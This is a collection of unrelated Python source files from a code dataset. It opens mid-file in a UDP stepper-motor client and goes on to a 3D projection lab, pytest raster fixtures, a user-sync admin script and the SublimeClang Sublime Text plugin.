12001\naddr = (IP, PORT)\nclientSocket = socket(AF_INET, SOCK_DGRAM)\nclientSocket.settimeout(1)\n\n@threaded\ndef Subir_descer(vel,controle,deslocamento):\n print(\"calculando S_D\")\t\n freq = vcalcular(vel)\n MSG = \"SeD:\"+str(vel)+':'+str(freq)+':'+str(controle)+':'+str(deslocamento)\n MSG =MSG.encode()\n\n ##print(MSG)\n clientSocket.sendto(MSG, addr)\n print(\"mensagem envia S_D\")\n try:\n data, server = clientSocket.recvfrom(4)\n #print ('%s' % (data)) \n except:\n Subir_descer(vel,controle,deslocamento)\n print(\"FALHOU ENVIANDO DE NOVO S_D\")\n@threaded \ndef Parar():\n \n MSG = b\"STOP\" \n clientSocket.sendto(MSG, addr)\n print(\" ENVIANDO PARAR\")\n try:\n data, server = clientSocket.recvfrom(4)\n #print ('%s' % (data)) \n except:\n Parar()\n print(\"FALHOU ENVIANDO DE NOVO pARAR\")\n@threaded \ndef subir():\n \n MSG = b\"SUBIR\" \n clientSocket.sendto(MSG, addr)\n try:\n data, server = clientSocket.recvfrom(4)\n #print ('%s' % (data)) \n except:\n subir() \n@threaded\ndef baixar():\n \n MSG = b\"BAIXAR\" \n clientSocket.sendto(MSG, addr)\n try:\n data, server = clientSocket.recvfrom(4)\n \n #print ('%s' % (data)) \n except:\n baixar()\n\n\n\ndef vcalcular(valor) :\n \"\"\"\n Função vcalcular calcula a frequência necessária para o o deslocamento em min/mm (parametro da função)\n como não foi encontrado nenhum tendencia na curva de frequência do controle do motor foi\n criado varias pequenas retas. como criar estas retas para o meu motor de passo ??\n Para nossa maquina de teste usamos a velocidade de 8 mm/min até 175 mm/min\n como pode ser visto no comandos condicionais utilizados a baixo(if),\n traçamos pequenas retas entre dois pontos no primeira condição percebe-se que o deslocamento está de\n 8mm/min a 14 mm/min e a variavel frequencia é a variavel utilizada para armazenar a equeção da reta que\n receberá o valor de mm/min que a maquina deve andar e calcula a frequencia necessaria para tal.\n após a thread responsavel por movimentar o motor será inicializada e o motor começará a andar na velocidade desejada.\n Para obter a equação da reta você deve chutar um frequencia você pode fazer issom usando a função get_pontos(frequencia_chutada),\n essa função manterá a maquina ligada por 1 min, após a maquina parar você deve medir a distancia percorrida por ela usando um paquimetro\n ou outro equipamento com boa precisão após pegue o valor chutado e o resultado obtido pela sua medição em uma tabela, quando\n tiver calculado 2 pontos poderá fazer o calculo de sua primeira reta.\n \"\"\"\n global frequencia\n valor = float(valor)\n velocidadei = valor;\n \n if (valor >= 8 and valor <= 14) :\n \n return (4.166666666666667*valor + 16.666666666666664)*0.96;\n \n \n \n if (valor > 14 and valor <= 16) :\n \n return (12.5*valor - 100)*0.96;\n \n \n if (valor > 16 and valor <= 21) :\n \n return (5*valor + 20)*0.96;\n \n \n if (valor > 21 and valor <= 26) :\n \n return (5*valor + 20)*0.96;\n \n \n if (valor > 26 and valor <= 33) :\n \n return (7.142857142857143*valor - 35.71428571428572)*0.96;\n \n \n \n if (valor > 33 and valor <= 45) :\n\n return (4.166666666666667*valor + 62.5)*0.96;\n \n\n\n\n \n elif(valor > 45 and valor <= 49 ) :\n return (12.5*valor -312.5)*0.96;\n \n \n\n \n \n elif(valor > 49 and valor <= 58) :\n \n return (5.555555555555555*valor + 27.77777777777777)*0.96\n #print(frequencia)\n \n \n elif(valor > 58 and valor <= 67) :\n\n \n return (5.555555555555555*valor + 27.77777777777777)*0.96;\n \n \n \n elif(valor > 67 and valor <= 73) :\n \n return (8.333333333333334 *valor -158.33333333333337)*0.96;\n \n \n \n elif(valor > 73 and valor <= 83) :\n \n return (5 *valor + 85)*0.96\n \n \n elif(valor > 83 and valor <= 87) :\n return (10*valor -330)*0.96;\n\n \n \n \n elif(valor > 87 and valor <= 97) :\n \n return (6*valor+18)*0.96;\n\n \n \n elif(valor > 97 and valor <= 106) : \n \n return (5.555555555555555*valor +61.111111111111086)*0.96\n\n \n \n \n elif(valor > 106 and valor <= 113):\n return (7.142857142857143 *valor -107.14285714285722)*0.96\n \n \n elif(valor > 113 and valor <= 119):\n return (8.333333333333334*valor -241.66666666666674)*0.96\n\n \n \n elif(valor > 119 and valor <= 126):\n return (7.142857142857143*valor- 100)*0.96;\n\n \n \n elif(valor > 126 and valor <= 133):\n return (7.142857142857143*valor - 100)*0.96\n \n \n elif(valor > 133 and valor <= 141) :\n\n return (4.545454545454546*valor + 245.45454545454538)*0.96\n\n \n elif(valor > 141 and valor <= 175) :\n return (6.323529411764706* valor +8.382352941176464)*0.96\n\n@threaded\ndef calcular(valor):\n\n freq = vcalcular(valor)\n \n MSG = \"Cal:\"+str(valor)+':'+str(freq)\n MSG =MSG.encode()\n ##print(MSG)\n clientSocket.sendto(MSG, addr)\n try:\n data, server = clientSocket.recvfrom(1024)\n #print ('%s' % (data)) \n except:\n calcular(valor)\n@threaded\ndef pong():\n MSG = \"1\"\n MSG =MSG.encode()\n clientSocket.sendto(MSG, addr)\n \ndef ping():\n print(\" ENVIANDO Ping\")\n MSG = \"ping\"\n MSG =MSG.encode()\n clientSocket.sendto(MSG, addr)\n try:\n data, server = clientSocket.recvfrom(1024)\n print(\" ping recebido\")\n return [1,IP,PORT] \n except:\n return [0,IP,PORT]\n\ndef start_thread(): \n \n thrMotor = thread_motor()\n thrMotor.start()\n@threaded\ndef freqparabotao():\n freqbt = vcalcular(70)\n\n MSG = \"fb:\"+str(freqbt)\n MSG =MSG.encode()\n ##print(MSG)\n clientSocket.sendto(MSG, addr)\n\n\n'''subir()\nbaixar()\nParar()\nSubir_descer(100.1,1,120)\ncalcular(150)'''\n\n","sub_path":"Cliente/Modulos/clientMotor-udp.py","file_name":"clientMotor-udp.py","file_ext":"py","file_size_in_byte":6988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"153895859","text":"import random\r\nfrom graphics import *\r\nimport math as mt\r\nimport time\r\nimport numpy as np\r\n\r\n# coordinates of parallelepiped\r\nxw = 600\r\nyw = 600\r\nst = 300\r\n\r\n# matrix of coordinates\r\nParallelepiped = np.array([[0, 0, 0, 1],\r\n [st, 0, 0, 1],\r\n [st, st, 0, 1],\r\n [0, st, 0, 1],\r\n [0, 0, st, 1],\r\n [st, 0, st, 1],\r\n [st, st, st, 1],\r\n [0, st, st, 1]])\r\nprint(\"Координати паралелепіпеда у вигляді матриці\")\r\nprint(Parallelepiped)\r\n\r\n# функція проекції на ХОУ\r\ndef ProjectXY(Figure):\r\n f = np.array([[1, 0, 0, 0],\r\n [0, 1, 0, 0],\r\n [0, 0, 0, 0],\r\n [0, 0, 0, 1]]) # по строках\r\n ft=f.T\r\n Prxy = Figure.dot(ft)\r\n print('Проекція на ХОУ')\r\n print(Prxy)\r\n return Prxy\r\n\r\n# зміщення\r\ndef ShiftXYZ(Figure, l, m, n):\r\n f = np.array([[1, 0, 0, l],\r\n [0, 1, 0, m],\r\n [0, 0, 1, n],\r\n [1, 0, 0, 1]]) # по строках\r\n ft=f.T\r\n Prxy = Figure.dot(ft)\r\n print('зміщення')\r\n print(Prxy)\r\n return Prxy\r\n# обертання коло oх\r\ndef insertX(Figure, TetaG):\r\n TetaR=(3/14*TetaG)/180\r\n f = np.array([[1, 0, 0, 0],\r\n [0, mt.cos(TetaR), mt.sin(TetaR), 0],\r\n [0, -mt.sin(TetaR), mt.cos(TetaR), 0],\r\n [0, 0, 0, 1]])\r\n ft=f.T\r\n Prxy = Figure.dot(ft)\r\n print('обертання коло х')\r\n print(Prxy)\r\n return Prxy\r\n# аксонометрія\r\ndef dimetri(Figure, TetaG1, TetaG2):\r\n\r\n TetaR1=(3/14*TetaG1)/180\r\n TetaR2=(3/14*TetaG2)/180\r\n\r\n f1 = np.array([[mt.cos(TetaR1), 0, -mt.sin(TetaR1), 0],\r\n [0, 1, 0, 0],\r\n [mt.sin(TetaR1), 0, mt.cos(TetaR1), 1],\r\n [0, 0, 0, 0]])\r\n ft1 = f1.T\r\n Prxy1 = Figure.dot(ft1)\r\n f2 = np.array([[1, 0, 0, 0],\r\n [0, mt.cos(TetaR2), mt.sin(TetaR2), 0],\r\n [0, -mt.sin(TetaR2), mt.cos(TetaR2), 0],\r\n [0, 0, 0, 1] ])\r\n ft2=f2.T\r\n Prxy2 = Prxy1.dot(ft2)\r\n print('Аксонометрія')\r\n print(Prxy2)\r\n return Prxy2\r\n# функція побудови паралелепіпеда\r\ndef PrlpdWiz(Prxy):\r\n Ax = Prxy[0, 0]\r\n Ay = Prxy[0, 1]\r\n\r\n Bx = Prxy[1, 0]\r\n By = Prxy[1, 1]\r\n\r\n Ix = Prxy[2, 0]\r\n Iy = Prxy[2, 1]\r\n\r\n Mx = Prxy[3, 0]\r\n My = Prxy[3, 1]\r\n\r\n Dx = Prxy[4, 0]\r\n Dy = Prxy[4, 1]\r\n\r\n Cx = Prxy[5, 0]\r\n Cy = Prxy[5, 1]\r\n\r\n Fx = Prxy[6, 0]\r\n Fy = Prxy[6, 1]\r\n\r\n Ex = Prxy[7, 0]\r\n Ey = Prxy[7, 1]\r\n\r\n # print(Ax, Ay); print(Bx, By); print(Ix, Iy); print(Mx, My);\r\n # print(Dx, Dy); print(Cx, Cy); print(Fx, Fy); print(Ex, Ey);\r\n colors = [\"red\", \"orange\", \"magenta\", \"pink\", \"lime\", \"green\", \"black\"]\r\n colors_2 = [\"skyblue\", \"cyan\", \"blue\"]\r\n a = colors[random.randint(0, len(colors) - 1)]\r\n b = colors[random.randint(0, len(colors) - 1)]\r\n c = colors[random.randint(0, len(colors) - 1)]\r\n d = colors[random.randint(0, len(colors) - 1)]\r\n e = colors_2[random.randint(0, len(colors_2) - 1)]\r\n z = colors_2[random.randint(0, len(colors_2) - 1)]\r\n t = colors_2[random.randint(0, len(colors_2) - 1)]\r\n r = colors_2[random.randint(0, len(colors_2) - 1)]\r\n\r\n\r\n\r\n obj1 = Polygon(Point(Ax, Ay), Point(Bx, By), Point(Ix, Iy), Point(Mx, My))\r\n obj1.setFill(e)\r\n obj1.setOutline(a)\r\n obj1.draw(win)\r\n\r\n obj2 = Polygon(Point(Dx, Dy), Point(Cx, Cy), Point(Fx, Fy), Point(Ex, Ey))\r\n obj2.setFill(z)\r\n obj2.setOutline(b)\r\n obj2.draw(win)\r\n\r\n obj3 = Polygon(Point(Ax, Ay), Point(Bx, By), Point(Cx, Cy), Point(Dx, Dy))\r\n obj3.setFill(t)\r\n obj3.setOutline(c)\r\n obj3.draw(win)\r\n\r\n obj4 = Polygon(Point(Mx, My), Point(Ix, Iy), Point(Fx, Fy), Point(Ex, Ey))\r\n obj4.setFill(r)\r\n obj4.setOutline(d)\r\n obj4.draw(win)\r\n return PrlpdWiz\r\n#-------------------------------------------- побудова паралелепіпеда -----------------------------\r\nwin = GraphWin(\"3-D модель паралелепіпеда, аксонометрічна проекція на ХУ\", xw, yw)\r\nwin.setBackground('white')\r\nxw=600\r\nyw=600\r\nst=50\r\nTetaG1=0\r\nTetaG2=-90\r\nl=(xw/3)-st\r\nm=(yw/3)-st\r\nn=m\r\n\r\n#Prlpd1=ShiftXYZ (Prlpd, l, m, n)\r\n#Prlpd2=dimetri (Prlpd1, TetaG1, TetaG2)\r\n#Prlpd2=insertX (Prlpd1, TetaG1)\r\n#Prxy3=ProjectXY (Prlpd2)\r\n\r\nPrxy3 = Parallelepiped\r\nPrlpdWiz(Prxy3)\r\nwin.getMouse()\r\nwin.close()\r\n\r\nwin = GraphWin(\"3-D модель паралелепіпеда, аксонометрічна проекція на ХУ\", xw, yw)\r\nwin.setBackground('white')\r\nxw=600\r\nyw=600\r\nst=50\r\nTetaG1=0\r\nTetaG2=-90\r\n\r\n# l=(xw/3)-st\r\nm=(yw/3)-st\r\n# n=m\r\n\r\nPrlpd1=ShiftXYZ (Parallelepiped, l, m, n)\r\n#Prlpd2=dimetri (Prlpd1, TetaG1, TetaG2)\r\nPrlpd2=insertX(Prlpd1, TetaG1)\r\nPrxy3=ProjectXY(Prlpd2)\r\nPrlpdWiz(Prxy3)\r\nwin.getMouse()\r\nwin.close()\r\n\r\nwin = GraphWin(\"3-D модель паралелепіпеда оберт коло Х аксонометрічна проекція на ХУ\", xw, yw)\r\nwin.setBackground('white')\r\nxw=600\r\nyw=600\r\nst=50\r\nTetaG1=180\r\nTetaG2=-90\r\nl=(xw/3)-st\r\nm=(yw/3)-st\r\nn=m\r\nPrlpd1=ShiftXYZ (Parallelepiped, l, m, n)\r\n#Prlpd2=dimetri (Prlpd1, TetaG1, TetaG2)\r\nPrlpd2=insertX(Prlpd1, TetaG1)\r\nPrxy3=ProjectXY(Prlpd2)\r\nPrlpdWiz(Prxy3)\r\nwin.getMouse()\r\nwin.close()\r\n\r\nwin = GraphWin(\"3-D паралелепіпеда діметричний оберт навколо Х та У аксонометрічна проекція на ХУ\", xw, yw)\r\nwin.setBackground('white')\r\nxw=600\r\nyw=600\r\nst=50\r\nTetaG1=180\r\nTetaG2=-90\r\nl=(xw/2)-st\r\nm=(yw/2)-st\r\nn = m\r\nPrlpd1=ShiftXYZ(Parallelepiped, l, m, n)\r\nPrlpd2=dimetri(Prlpd1, TetaG1, TetaG2)\r\n#Prlpd2=insertX (Prlpd1, TetaG1)\r\nPrxy3=ProjectXY(Prlpd2)\r\nPrlpdWiz(Prxy3)\r\nwin.getMouse()\r\nwin.close()\r\n\r\n","sub_path":"Lab3.py","file_name":"Lab3.py","file_ext":"py","file_size_in_byte":6021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"310302227","text":"\"\"\" Utility functions for tests. \"\"\"\nimport numpy as np\nimport pytest\nfrom affine import Affine\nimport rasterio as rio\n\n\n@pytest.fixture\ndef basic_image():\n \"\"\"\n A 10x10 array with a square (3x3) feature\n Equivalent to results of rasterizing basic_geometry with all_touched=True.\n Borrowed from rasterio/tests/conftest.py\n\n Returns\n -------\n numpy ndarray\n \"\"\"\n image = np.zeros((10, 10), dtype=np.uint8)\n image[2:5, 2:5] = 1\n return image\n\n\n@pytest.fixture\ndef basic_image_tif(tmpdir, basic_image):\n \"\"\"\n A GeoTIFF representation of the basic_image array.\n Borrowed from rasterio/tests/conftest.py\n\n Returns\n -------\n string path to raster file\n \"\"\"\n outfilename = str(tmpdir.join(\"basic_image.tif\"))\n kwargs = {\n \"crs\": rio.crs.CRS({\"init\": \"epsg:4326\"}),\n \"transform\": Affine.identity(),\n \"count\": 1,\n \"dtype\": rio.uint8,\n \"driver\": \"GTiff\",\n \"width\": basic_image.shape[1],\n \"height\": basic_image.shape[0],\n \"nodata\": None,\n }\n with rio.open(outfilename, \"w\", **kwargs) as out:\n out.write(basic_image, indexes=1)\n return outfilename\n\n\n@pytest.fixture\ndef image_array_2bands():\n return np.random.randint(10, size=(2, 4, 5))\n","sub_path":"earthpy/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"591481592","text":"#!/usr/bin/env python3.6\n\nimport sys\nimport subprocess\nimport pwd\n\n\ndef add(user_info):\n print(f\"Adding a new user '{user_info['name']}'\")\n try:\n subprocess.call(['useradd',\n '-p',\n user_info['password'],\n '-G',\n _groups_str(user_info),\n user_info['name'],\n ])\n except:\n print(f\"Failed to add user '{user_info['name']}'\")\n sys.exit(1)\n\ndef remove_user(user_info):\n print(f\"Removing user '{user_info['name']}'\")\n\n try:\n subprocess.call(['userdel',\n '-r',\n user_info['name']\n ])\n except:\n print(f\"Failed to remove the user '{user_info['name']}'\")\n sys.exit(1)\n\ndef update_user(user_info):\n print(f\"Updating user '{user_info['name']}'\")\n try:\n subprocess.call(['usermod',\n '-p',\n user_info['password'],\n '-G',\n _groups_str(user_info),\n user_info['name'],\n ])\n except:\n print(f\"Failed to update the user '{user_info['name']}'\")\n sys.exit(1)\n\ndef sync(users, existing_user_names=None):\n existing_user_names = (existing_user_names or _user_names())\n user_names = [user['name'] for user in users]\n for user in users:\n if user['name'] not in existing_user_names:\n add(user)\n elif user['name'] in existing_user_names:\n update_user(user)\n for user_name in existing_user_names:\n if not user_name in user_names:\n remove({'name': user_name})\n\ndef _groups_str(user_info):\n return '.'.join(user_info['groups'] or [])\n\ndef _user_names():\n return [user.pw_name for user in pwd.getwall()\n if user.pw_uid >= 1000 and 'home' in user.pw_dir]\n","sub_path":"src/hr/hr_user_manag.py","file_name":"hr_user_manag.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"577377906","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nCopyright (c) 2011-2012 Fredrik Ehnbom\n\nThis software is provided 'as-is', without any express or implied\nwarranty. In no event will the authors be held liable for any damages\narising from the use of this software.\n\nPermission is granted to anyone to use this software for any purpose,\nincluding commercial applications, and to alter it and redistribute it\nfreely, subject to the following restrictions:\n\n 1. The origin of this software must not be misrepresented; you must not\n claim that you wrote the original software. If you use this software\n in a product, an acknowledgment in the product documentation would be\n appreciated but is not required.\n\n 2. Altered source versions must be plainly marked as such, and must not be\n misrepresented as being the original software.\n\n 3. This notice may not be removed or altered from any source\n distribution.\n\"\"\"\n\n\"\"\"\nCopyright (c) 2016 Sami Väisänen, Ensisoft\nhttp://www.ensisoft.com\n\"\"\"\n\nimport sublime\ntry:\n import ctypes\nexcept:\n sublime.error_message(\\\n\"\"\"Unfortunately ctypes can't be imported, so SublimeClang will not work.\n\nThere is a work around for this to get it to work, \\\nplease see http://www.github.com/ensisoft/SublimeClang for more details. \"\"\")\n\nfrom internals.clang import cindex\nfrom internals import common\nfrom internals import translationunit as tulib\nfrom internals import translationunitcache as cache\nfrom internals.translationunitcache import Language as Language\nfrom internals.translationunitcache import CompileOptions as CompileOptions\nfrom internals.translationunitcache import TranslationUnitCache as TUCache\nfrom sublime import Region\nimport sublime\nimport sublime_plugin\nimport errormarkers\nimport threading\nimport os\nimport re\nimport sys\nimport Queue as Queue\n\n# todo: what's with the sencode??\ndef get_filename(view):\n return common.sencode(view.file_name())\n\n\n# identify the language inside the file the view displays\ndef get_language(view):\n language_regex = re.compile(\"(?<=source\\.)[\\w+#]+\")\n\n caret = view.sel()[0].a\n language = language_regex.search(view.scope_name(caret))\n if language == None:\n return Language(Language.Other)\n lang = language.group(0).lower()\n #print(\"LANG IS : \" + lang)\n if lang in \"c\":\n return Language(Language.C)\n elif lang in \"c++\":\n return Language(Language.CPP)\n elif lang in \"objc\":\n return Language(Language.ObjC)\n elif lang in \"objc++\":\n return Language(Language.ObjCPP)\n\n return Language(Language.Other)\n\n\nSystemIncludes = None\n\n\n# collect all compilation options based on the view and the file\n# the user is currently working on.\n# creates a CompileOptions object.\ndef collect_all_options(view, filename, language):\n assert view is not None\n assert filename is not None\n assert language is not None\n assert language.is_supported()\n assert cindex.conf is not None\n\n global SystemIncludes\n\n # use clang to figure out the magical -isystem paths\n # todo: ObjC and ObjCPP ??\n if SystemIncludes == None:\n packages = sublime.packages_path()\n package = os.path.join(packages, \"SublimeClang\")\n source = \"\"\n compiler = \"\"\n cindex.conf.arch = sublime.arch()\n if language.kind == Language.C:\n source = \"test.c\"\n compiler = cindex.conf.locate_clang()\n elif language.kind == Language.CPP:\n source = \"test.cpp\"\n compiler = cindex.conf.locate_clang_cpp()\n else:\n raise Error(\"Unsupported language.\")\n\n source = os.path.join(package, source)\n info = common.ClangInfo.collect(compiler, source)\n SystemIncludes = info.internal_isystem\n print(\"Found system includes:\")\n print(SystemIncludes)\n\n # this is how we got it from the settings before...\n #sys_includes = common.get_setting(\"system_include_paths\", [])\n\n opt = CompileOptions(language, SystemIncludes)\n\n # This is the bitmask sent to index.parse.\n # For example, to be able to go to the definition of\n # preprocessed macros, set it to 1, for using an implicit\n # precompiled header set it to 4 and for caching completion\n # results, set it to 8. Or all together 1+4+8=13.\n # See http://clang.llvm.org/doxygen/group__CINDEX__TRANSLATION__UNIT.html#gab1e4965c1ebe8e41d71e90203a723fe9\n # and http://clang.llvm.org/doxygen/Index_8h_source.html\n # for more details\n opt.index_parse_type = 13\n\n language_options = common.get_setting(\"language_options\", {})\n if language_options.has_key(language.key()):\n opt.language_options = language_options[language.key()]\n\n project_file, project_options = common.get_project_settings(filename)\n if project_file != None:\n opt.project_file = project_file\n opt.project_options = project_options\n return opt\n\n# initialize cache if not done yet.\n\ndef get_cache():\n import platform\n import os\n if cindex.conf == None:\n try:\n cindex.conf = cindex.Config()\n cindex.arch = sublime.arch()\n cindex.register_enumerations()\n print(cindex.conf.library_file)\n except OSError as err:\n print(err)\n library = cindex.conf.library_file\n if os.system == 'Linux':\n common.error_message(\n\"\"\"It looks like '%s' couldn't be loaded. On Linux use your package manager to install clang-3.7.1\\n\\n \\\nor alternatively download a pre-built binary from http://www.llvm.org and put it in your ~/bin/\\n\\n \\\nVisit https://github.com/ensisoft/SublimeClang for more information.\"\"\" % (library))\n else:\n common.error_message(\n\"\"\"It looks like '%s' couldn't be loaded.\\n\\n \\\nDownload a pre-built binary from http://www.llvm.org and install it in your system.\\n\\n \\\nNote that the architecture needs to match your SublimeText 2 architecture.\\n\\n \\\nVisit https://github.com/ensisoft/SublimeClang for more information.\"\"\" % (library))\n raise err\n\n if tulib.cachelib == None:\n libcache = \"\"\n packages = sublime.packages_path()\n package = os.path.join(packages, \"SublimeClang\")\n arch = sublime.arch()\n try:\n libname = tulib.get_cache_library(arch)\n libcache = os.path.join(package, libname)\n\n tulib.init_cache_lib(libcache)\n print(\"Loaded: '%s'\" % (libcache))\n except OSError as err:\n print(err)\n if os.system == 'Linux':\n common.error_message(\n\"\"\"It looks like '%s' couldn't be loaded. On Linux you have to compile it yourself.\\n\\n \\\nGo to into your ~/.config/sublime-text-2/Packages/SublimeClang and run make.\\n\\n \\\nVisit https://github.com/ensisoft/SublimeClang for more information.\"\"\" % (libcache))\n else:\n common.error_message(\n\"\"\"It looks like '%s' couldn't be loaded.\\n\\n \\\nVisit https://github.com/ensisoft/SublimeClang for more information.\"\"\" % (libcache))\n raise err\n\n if cache.tuCache == None:\n number_threads = 4\n cache.tuCache = TUCache(number_threads)\n\n return cache.tuCache\n\ndef warm_up_cache(view, filename, language):\n cache = get_cache()\n state = cache.get_status(filename)\n\n if state == TUCache.STATUS_NOT_IN_CACHE:\n opts = collect_all_options(view, filename, language)\n cache.prepare(filename, opts)\n\n return state\n\n# process, i.e. compile the given file identified by filename.\n# gathers the arguments from project files for compiling.\n# returns a translation unit object\ndef get_translation_unit(view, filename, language, blocking=False):\n cache = get_cache()\n\n if common.get_setting(\"warm_up_in_separate_thread\", True) and not blocking:\n stat = warm_up_cache(view, filename, language)\n if stat == TUCache.STATUS_NOT_IN_CACHE:\n return None\n elif stat == TUCache.STATUS_PARSING:\n sublime.status_message(\"Hold your horses, cache still warming up\")\n return None\n\n opts = collect_all_options(view, filename, language)\n debug = common.get_setting(\"debug\", False)\n if debug == True:\n print(\"Compiling: '%s'\" % (filename))\n print(\"Language: '%s'\" % (language))\n print(\"Project File: '%s'\" % (opts.project_file))\n print(\"Options:\")\n print(opts)\n\n return cache.get_translation_unit(filename, opts)\n\nnavigation_stack = []\nclang_complete_enabled = True\n\n\ndef format_current_file(view):\n row, col = view.rowcol(view.sel()[0].a)\n filename = get_filename(view)\n return \"%s:%d:%d\" % (filename, row + 1, col + 1)\n\n\ndef navi_stack_open(view, target):\n navigation_stack.append((format_current_file(view), target))\n view.window().open_file(target, sublime.ENCODED_POSITION)\n\n\nclass ClangTogglePanel(sublime_plugin.WindowCommand):\n def run(self, **args):\n show = args[\"show\"] if \"show\" in args else None\n aview = sublime.active_window().active_view()\n error_marks = common.get_setting(\"error_marks_on_panel_only\", False, aview)\n\n if show or (show == None and not clang_error_panel.is_visible(self.window)):\n errormarkers.clang_error_panel.open(self.window)\n if error_marks:\n show_error_marks(aview)\n else:\n errormarkers.clang_error_panel.close()\n if error_marks:\n erase_error_marks(aview)\n\n\nclass ClangToggleCompleteEnabled(sublime_plugin.TextCommand):\n def run(self, edit):\n global clang_complete_enabled\n clang_complete_enabled = not clang_complete_enabled\n sublime.status_message(\"Clang complete is %s\" % (\"On\" if clang_complete_enabled else \"Off\"))\n\n\nclass ClangWarmupCache(sublime_plugin.TextCommand):\n def run(self, edit):\n view = self.view\n language = get_language(view)\n filename = get_filename(view)\n\n stat = warm_up_cache(view, filename, language)\n if stat == TUCache.STATUS_PARSING:\n sublime.status_message(\"Cache is already warming up\")\n elif stat != TUCache.STATUS_NOT_IN_CACHE:\n sublime.status_message(\"Cache is already warmed up\")\n\n\nclass ClangGoBackEventListener(sublime_plugin.EventListener):\n def on_close(self, view):\n if not common.get_setting(\"pop_on_close\", True, view):\n return\n # If the view we just closed was last in the navigation_stack,\n # consider it \"popped\" from the stack\n filename = get_filename(view)\n while True:\n if len(navigation_stack) == 0 or \\\n not navigation_stack[\n len(navigation_stack) - 1][1].startswith(filename):\n break\n navigation_stack.pop()\n\n\nclass ClangGoBack(sublime_plugin.TextCommand):\n def run(self, edit):\n assert len(navigation_stack) > 0\n\n self.view.window().open_file(\n navigation_stack.pop()[0], sublime.ENCODED_POSITION)\n\n def is_enabled(self):\n if len(navigation_stack) == 0:\n return False\n view = sublime.active_window().active_view()\n lang = get_language(view)\n if lang.is_supported() == False:\n return False\n\n return True\n\n def is_visible(self):\n return self.is_enabled()\n\n\nclass ClangGotoBase(sublime_plugin.TextCommand):\n def get_target(self, tu, data, offset, found_callback, folders):\n pass\n\n def found_callback(self, target):\n if target == None:\n sublime.status_message(\"Don't know where the %s is!\" % self.goto_type)\n elif not isinstance(target, list):\n navi_stack_open(self.view, target)\n else:\n self.targets = target\n self.view.window().show_quick_panel(target, self.open_file)\n\n def open_file(self, idx):\n if idx >= 0:\n target = self.targets[idx]\n if isinstance(target, list):\n target = target[1]\n navi_stack_open(self.view, target)\n\n def run(self, edit):\n view = self.view\n filename = get_filename(view)\n language = get_language(view)\n tu = get_translation_unit(view, filename, language)\n if tu == None:\n return\n\n offset = view.sel()[0].a\n data = view.substr(sublime.Region(0, view.size()))\n self.get_target(tu, data, offset, self.found_callback, self.view.window().folders())\n\n\n def is_enabled(self):\n return True\n\n def is_visible(self):\n view = sublime.active_window().active_view()\n lang = get_language(view)\n return lang.is_supported()\n\n\nclass ClangGotoDefinition(ClangGotoBase):\n def get_target(self, tu, data, offset, found_callback, folders):\n self.goto_type = \"definition\"\n return tu.find_definition(data, offset, found_callback, folders)\n\n\nclass ClangGotoDeclaration(ClangGotoBase):\n def get_target(self, tu, data, offset, found_callback, folders):\n self.goto_type = \"declaration\"\n return tu.find_declaration(data, offset, found_callback, folders)\n\n\nclass ClangClearCache(sublime_plugin.TextCommand):\n def run(self, edit):\n if cache.tuCache is None:\n return\n cache.tuCache.clear()\n sublime.status_message(\"Cache cleared!\")\n\n\n# test for suppressing diagnostics based on suspected clang bugs.\n# todo: are the messages localized??\ndef suppress_based_on_clang_bug(source_file, message):\n if source_file.endswith(\".h\") or source_file.endswith(\".hh\") or source_file.endswith(\".hpp\"):\n if message in \"cannot use 'throw' with exceptions disabled\":\n return True\n return False\n\n# test for suppressing diagnostics based on source file location.\ndef suppress_based_on_location(source_file):\n suppress_dirs = common.get_setting(\"diagnostic_suppress_dirs\", [])\n for d in suppress_dirs:\n if source_file in d:\n return True\n return False\n\n# test for suppressing diagnostics based on simple string matching.\ndef suppress_based_on_match(message):\n suppress_strings = common.get_setting(\"diagnostic_suppress_match\", [])\n for suppress in suppress_strings:\n if suppress in message:\n return True\n return False\n\n\ndef display_compilation_results(view):\n filename = get_filename(view)\n language = get_language(view)\n\n # todo: this can be None if warm_up_in_separate_thread is true.\n # fix this somehow?\n\n tu = get_translation_unit(view, filename, language)\n assert tu is not None\n\n errormarkers.clear_error_marks() # clear visual error marks\n errormarkers.erase_error_marks(view)\n\n errString = \"\"\n errorCount = 0\n warningCount = 0\n diagnostics = tu.get_diagnostics()\n\n for diagnostic in diagnostics:\n source = diagnostic.filename\n name = diagnostic.name\n line = diagnostic.line\n col = diagnostic.column\n spelling = diagnostic.spelling\n\n if diagnostic.is_fatal():\n if \"not found\" in spelling:\n message = \"Did you configure the include path used by clang properly?\\n\" \\\n \"See http://github.com/ensisoft/SublimeClang for more details on how to configure SublimeClang.\"\n errString = \"%s\" % (message)\n message = \"%s:%d,%d - %s - %s\" % (source, line, col, name, spelling)\n errString = \"%s\\n%s\" % (errString, message)\n break\n\n if suppress_based_on_location(source):\n continue\n elif suppress_based_on_match(spelling):\n continue\n elif suppress_based_on_clang_bug(source, spelling):\n continue\n\n message = \"%s:%d,%d - %s - %s\" % (source, line, col, name, spelling)\n if diagnostic.can_ignore():\n if diagnostic.has_suppression():\n disable_flag = diagnostic.disable_flag\n message = \"%s [Disable with %s]\" % (message, disable_flag)\n\n errString = \"%s%s\\n\" % (errString, message)\n if diagnostic.is_warning():\n warningCount += 1\n elif diagnostic.is_error():\n errorCount += 1\n\n errormarkers.add_error_mark(name, source, line - 1, spelling)\n\n if errorCount > 0 or warningCount > 0:\n statusString = \"Clang Status: \"\n if errorCount > 0:\n statusString = \"%s%d Error%s\" % (statusString, errorCount, \"s\" if errorCount != 1 else \"\")\n if warningCount > 0:\n statusString = \"%s%s%d Warning%s\" % (statusString, \", \" if errorCount > 0 else \"\",\n warningCount, \"s\" if warningCount != 1 else \"\")\n view.set_status(\"SublimeClang\", statusString)\n else:\n view.erase_status(\"SublimeClang\")\n\n window = view.window()\n if not window is None:\n show_panel = errString\n window.run_command(\"clang_toggle_panel\", {\"show\": show_panel})\n\n errormarkers.clang_error_panel.set_data(errString)\n errormarkers.update_statusbar(view)\n 